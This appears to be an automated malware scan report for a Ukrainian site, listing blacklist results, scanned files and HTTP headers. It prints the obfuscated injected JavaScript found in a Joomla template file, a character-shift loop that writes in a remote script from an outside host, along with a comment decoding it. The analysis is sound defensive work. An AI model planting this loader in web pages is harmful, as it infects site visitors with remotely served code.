Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=decoclay-a.com.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://decoclay-a.com.ua/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://decoclay-a.com.ua/ | 200 OK Content-Length: 36407 Content-Type: text/html | suspicious |
    Page code contains blacklisted domain: china-fan.in.ua ...[23635 bytes skipped]... /h3> <div class="jamod-content"><div class="advs bannergroup_text"> <div class="bannerfooter_text"> <div>TRN.ua — <a href="http://www.trn.ua/" target="_blank">тренинги в Украине</a></div> <div>Osvita.com.ua — <a href="http://osvita.com.ua/courses/" target="_blank">курсы в Украине</a></div> <div>china-fan.in.ua — <a href="http://www.china-fan.in.ua">поездки в Китай</a></div> <div><a href='http://spravka.ua' title='SPRAVKA.UA - Бизнес-Каталог товаров и услуг Украины' target='_blank'>SPRAVKA.UA - Бизнес-Каталог товаров и услуг Украины</a></div> <div><a href="http://kiev.com.ua/forum/" title="Киев Форум">Киев Форум</a></div& ...[19032 bytes skipped]...
http://decoclay-a.com.ua/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://decoclay-a.com.ua/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 3207 Content-Type: application/x-javascript | clean |
http://decoclay-a.com.ua/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 1859 Content-Type: application/x-javascript | malicious |
    Malicious code - confirmed by antiviruses (see below)

    // Original JA Purity template code (MooTools); this part is legitimate.
    var JA_Collapse_Mod = new Class({
      initialize: function(myElements) {
        options = Object.extend({ transition: Fx.Transitions.quadOut }, {});
        this.myElements = myElements;
        var exModules = excludeModules.split(',');
        exModules.each(function(el, i) { exModules[i] = 'Mod' + el; });
        myElements.each(function(el, i) {
          el.elmain = $E('.jamod-content', el);
          el.titleEl = $E('h3', el);
          if (!el.titleEl) return;
          if (exModules.contains(el.id)) { }
          if (!el.titleEl.className) el.titleEl.className = rightCollapseDefault;
          if (el.titleEl.className == 'hide') el.hide();
        });
      }
    });
    window.addEvent('load', function(e) {
      var jamod = new JA_Collapse_Mod($ES('.jamod'));
    });
    // Injected block appended to the template file. Browsers treat "<!--" in a
    // script as a line comment, so the markers do not break execution. The loop
    // shifts each of the 54 character codes down by one and document.write()s the
    // result, which decodes to: <script src="http://www.fmi.kz/cli/stat.php"></script>
    // i.e. a remote script loaded into every page that uses this template.
    <!-- js-tools -->
    w=0;while(w<54)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/gnj/l{0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(w++)-1))
    <!-- /js-tools -->

    Antivirus reports:
http://decoclay-a.com.ua//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 311 Content-Type: text/html | clean |
http://decoclay-a.com.ua/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2356641 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://t.proext.com/js/to.js | 200 OK Content-Length: 1863 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: decoclay-a.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 18:52:06 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Jun 2014 18:52:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b75af2d6005efb5f44ceb310347e0ff9=84355b1c92942d3f990efee923d345d3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 14-Jun-2015 18:52:06 GMT; path=/
X-Powered-By: PHP/5.3.24
Second query (visit from search engine):
GET / HTTP/1.1
Host: decoclay-a.com.ua
Referer: http://www.google.com/search?q=decoclay-a.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.